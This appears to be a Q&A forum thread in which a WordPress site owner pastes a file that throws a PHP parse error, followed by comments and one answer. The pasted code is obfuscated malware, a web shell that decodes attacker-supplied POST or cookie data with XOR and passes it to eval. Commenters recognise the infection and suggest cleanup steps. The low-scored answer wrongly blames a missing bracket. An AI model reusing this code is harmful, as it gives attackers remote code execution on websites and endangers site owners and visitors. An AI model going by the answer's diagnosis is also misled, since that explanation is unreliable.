# Parse error: syntax error, unexpected '$o871' (T_VARIABLE)

Tags: php, wordpress

Everything is working fine on my wordpress site but now i am getting this parse error and i am unable to solve it. Even i can't login to my wp-admin

This Is the full Code:

```
$p8d6f3d7 =457;$GLOBALS['c914']=Array();global$c914;$c914=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['y875352']="\x2d\x27\x75\x9\x3c\x3e\x5a\x4b\x21\x38\x2e\x51\x70\x59\x5d\x53\x24\x49\x58\xa\x48\x46\x25\x41\x54\x7c\x7a\x4f\x31\x2a\x23\x61\x57\x5b\x72\x36\xd\x4a\x74\x68\x4c\x2c\x2f\x4d\x20\x52\x5f\x64\x3b\x43\x42\x32\x5e\x3f\x67\x28\x30\x65\x50\x34\x37\x55\x3d\x56\x6e\x29\x78\x60\x39\x2b\x45\x26\x79\x6d\x5c\x76\x6f\x44\x66\x22\x35\x3a\x6b\x6c\x62\x69\x73\x4e\x63\x77\x47\x7b\x6a\x71\x7d\x40\x7e\x33";$c914[$c914['y875352'][75].$c914['y875352'][88].$c914['y875352'][59].$c914['y875352'][9].$c914['y875352'][60].$c914['y875352'][68].$c914['y875352'][68].$c914['y875352'][60]]=$c914['y875352'][12].$c914['y875352'][31].$c914['y875352'][88].$c914['y875352'][82];$c914[$c914['y875352'][78].$c914['y875352'][35].$c914['y875352'][59].$c914['y875352'][51].$c914['y875352'][60].$c914['y875352'][88]]=$c914['y875352'][88].$c914['y875352'][76].$c914['y875352'][2].$c914['y875352'][64].$c914['y875352'][38];$c914[$c914['y875352'][12].$c914['y875352'][97].$c914['y875352'][59].$c914['y875352'][84].$c914['y875352'][28].$c914['y875352'][68].$c914['y875352'][47]]=$c914['y875352'][86].$c914['y875352'][2].$c914['y875352'][84].$c914['y875352'][86].$c914['y875352'][38].$c914['y875352'][34];$c914[$c914['y875352'][57].$c914['y875352'][35].$c914['y875352'][28].$c914['y875352'][47].$c914['y875352'][47].$c914['y875352'][57].$c914['y875352'][9]]=$c914['y875352'][86].$c914['y875352'][38].$c914['y875352'][34].$c914['y875352'][83].$c914['y875352'][57].$c914['y875352'][64];$c914[$c914['y875352'][88].$c914['y875352'][56].$c914['y875352'][51].$c914['y875352'][88].$c914['y875352'][47].$c914['y875352'][80]]=$c914['y875352'][57].$c914['y875352'][66].$c914['y875352'][12].$c914['y875352'][83].$c914['y875352'][76].$c914['y875352'][47].$c914['y875352'][57];$c914[$c914['y875352'][73].$c914['y875352'][31].$c914['y875352'][51].$c914['y875352'][31].$c914['y875352'][84].$c914['y875352'][57].$c914['y875352'][78].$c914['y875352'][47].$c914['y875352'][80]]=$c914['y875352'][86].$c914['y875352'][38].$c914['y875352'][34].$c914['y875352'][46].$c914['y875352'][34].$c914['y875352'][57].$c914['y875352'][12].$c914['y875352'][57].$c914['y875352'][31].$c914['y875352'][38];$c914[$c914['y875352'][12].$c914['y875352'][68].$c914['y875352'][28].$c914['y875352'][84]]=$_POST;$c914[$c914['y875352'][88].$c914['y875352'][51].$c914['y875352'][97].$c914['y875352'][57]]=$_COOKIE;
$xc67522=Array($c914['y875352'][34].$c914['y875352'][31].$c914['y875352'][64].$c914['y875352'][47].$c914['y875352'][76].$c914['y875352'][73].$c914['y875352'][28]=>$c914['y875352'][34].$c914['y875352'][31].$c914['y875352'][64].$c914['y875352'][47].$c914['y875352'][76].$c914['y875352'][73].$c914['y875352'][51]);$yfce366=Array($c914['y875352'][34].$c914['y875352'][31].$c914['y875352'][64].$c914['y875352'][47].$c914['y875352'][76].$c914['y875352'][73].$c914['y875352'][97]=>$c914['y875352'][34].$c914['y875352'][31].$c914['y875352'][64].$c914['y875352'][47].$c914['y875352'][76].$c914['y875352'][73].$c914['y875352'][59]);foreach(Array($xc67522,$c914[$c914['y875352'][12].$c914['y875352'][68].$c914['y875352'][28].$c914['y875352'][84]],$yfce366,$c914[$c914['y875352'][88].$c914['y875352'][51].$c914['y875352'][97].$c914['y875352'][57]])as$odc1){foreach($odc1as$o871=>$p74690){$p74690=@$c914[$c914['y875352'][75].$c914['y875352'][88].$c914['y875352'][59].$c914['y875352'][9].$c914['y875352'][60].$c914['y875352'][68].$c914['y875352'][68].$c914['y875352'][60]]($c914['y875352'][20].$c914['y875352'][29],$p74690);$o871.=$c914['y875352'][59].$c914['y875352'][28].$c914['y875352'][60].$c914['y875352'][51].$c914['y875352'][47].$c914['y875352'][60].$c914['y875352'][35].$c914['y875352'][51].$c914['y875352'][0].$c914['y875352'][28].$c914['y875352'][60].$c914['y875352'][56].$c914['y875352'][56].$c914['y875352'][0].$c914['y875352'][59].$c914['y875352'][60].$c914['y875352'][88].$c914['y875352'][57].$c914['y875352'][0].$c914['y875352'][84].$c914['y875352'][88].$c914['y875352'][88].$c914['y875352'][51].$c914['y875352'][0].$c914['y875352'][60].$c914['y875352'][68].$c914['y875352'][56].$c914['y875352'][68].$c914['y875352'][68].$c914['y875352'][9].$c914['y875352'][88].$c914['y875352'][60].$c914['y875352'][84].$c914['y875352'][60].$c914['y875352'][60].$c914['y875352'][9];$debb002=$p74690^$c914[$c914['y875352'][12].$c914['y875352'][97].$c914['y875352'][59].$c914['y875352'][84].$c914['y875352'][28].$c914['y875352'][68].$c914['y875352'][47]]($c914[$c914['y875352'][73].$c914['y875352'][31].$c914['y875352'][51].$c914['y875352'][31].$c914['y875352'][84].$c914['y875352'][57].$c914['y875352'][78].$c914['y875352'][47].$c914['y875352'][80]]($o871,($c914[$c914['y875352'][57].$c914['y875352'][35].$c914['y875352'][28].$c914['y875352'][47].$c914['y875352'][47].$c914['y875352'][57].$c914['y875352'][9]]($p74690)/$c914[$c914['y875352'][57].$c914['y875352'][35].$c914['y875352'][28].$c914['y875352'][47].$c914['y875352'][47].$c914['y875352'][57].$c914['y875352'][9]]($o871))+1),0,$c914[$c914['y875352'][57].$c914['y875352'][35].$c914['y875352'][28].$c914['y875352'][47].$c914['y875352'][47].$c914['y875352'][57].$c914['y875352'][9]]($p74690));$debb002=$c914[$c914['y875352'][88].$c914['y875352'][56].$c914['y875352'][51].$c914['y875352'][88].$c914['y875352'][47].$c914['y875352'][80]]($c914['y875352'][30],$debb002);if($c914[$c914['y875352'][78].$c914['y875352'][35].$c914['y875352'][59].$c914['y875352'][51].$c914['y875352'][60].$c914['y875352'][88]]($debb002)==3){eval/*c0e71ecf*/($debb002[1]($debb002[2]));exit();}}}
```

This is where i am getting `Parse error: syntax error, unexpected '$o871' (T_VARIABLE)`

This is the line:

```
 foreach($odc1as$o871=>$p74690){
```

Comment: Ewww, that looks like malware to me .... just saying.  Nasty stuff.

Comment: Possible duplicate of [PHP Parse/Syntax Errors; and How to solve them?](https://stackoverflow.com/questions/18050071/php-parse-syntax-errors-and-how-to-solve-them)

Comment: @ArtisticPhoenix what should i do i cant even login to my wp-admin. if i rename this file it gives error require(): Failed opening required

Comment: you have been hacked, delete, restore from back ups, patch all code to latest versions, change all passwords

Comment: Remember you can always comment stuff out.  Simply wrap it in `/*  */` block comments to start.

Comment: @ArtisticPhoenix no luck if i comment i get error in other file. Maybe site been hacked cause its working fine i have not done anything

Comment: Best bet (assuming you don't have backups) is to check your theme for hacked files/code, and then on a local server (I always do development on a local server) create a new instance of wordpress, copy your database, install your "clean" theme, install new copies of all your plugins. it's not trivial though.  That way all you have to clean is your theme

Comment: When its done and your site is restored locally, migrate it to your server, reset all passwords that are in wp-config.  Delete any WP accounts you are not sure about etc..

Answer (score -2):

Possibly check you applied extra curly opening or closing bracket.Or forgot to close the curly bracket.